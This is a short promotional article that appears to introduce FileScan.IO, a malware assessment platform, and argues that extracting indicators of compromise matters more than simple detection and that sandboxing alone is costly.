Let's start out by describing the problem, followed by our solution.
We need more than detection
We all know that fast and effective response within the incident response cycle is key. Yes, speed matters, but so does diligence and depth of analysis. Today, dealing with malware is more than the binary question of detecting if a file is good/bad. First of all, there are many shades of grey. Secondly, having full understanding of the impact of a potential threat (why is it bad? what capabilities are present? what underlying network infrastructure is being used?) is vital to a full IT security workflow. At the very minimum, an analysis system needs to be able to extract embedded Indicators of Compromise ("IOCs") for pre-emptive measures and to detect e.g. a potential breach. Thus far, mostly due to heavy obfuscation and encryption, only actual execution of malware (typically within an isolated environment / sandbox, also known as dynamic analysis) has been able to extract needed key IOCs (e.g. network IPs, URLs, Domains) on a consistent basis. However, standing up a scalable array of sandboxes in order to scan every file comes with a lot of overhead. For example, maintaining an array of VM image snapshots, security updates, filtering out white noise, hardware requirements, limited throughput, etc.
Why are IOCs important?
As mentioned, purely detecting malware is not enough. Only by uncovering potential IOCs often hidden behind many layers of obfuscation (e.g. an obfuscated VBA macro calling powershell, which eventually downloads a file), it becomes possible to perform better attribution and understanding of the nature of an attack. Furthermore, IOCs lead to detecting other potentially compromised endpoints and allows preemptive protection of assets e.g. by blocking the underlying network IPs/Domains in your firewall (thereby avoiding data corruption and exfiltration).
Is sandboxing the golden bullet?
IOC Extraction Today
However, for a low volume of files (and forensic purposes alike), sandboxing becomes quite useful. So how do we reduce the workload? Using white-/blacklists helps, but only so much, as they are often based on the file hash. Modern malware campaigns are performed with thousands of automatically generated malware samples that are fresh and unknown. So we had to conclude, as is often the case in IT-Security: there is no silver bullet.
Rapid IOC Feedback Loop
FileScan.IO is a next-gen malware assessment platform with the following emphasis:
- Providing rapid and in-depth threat analysis services capable of massive processing
- Focus on Indicator-of-Compromise (IOC) extraction and actionable context
Want more information?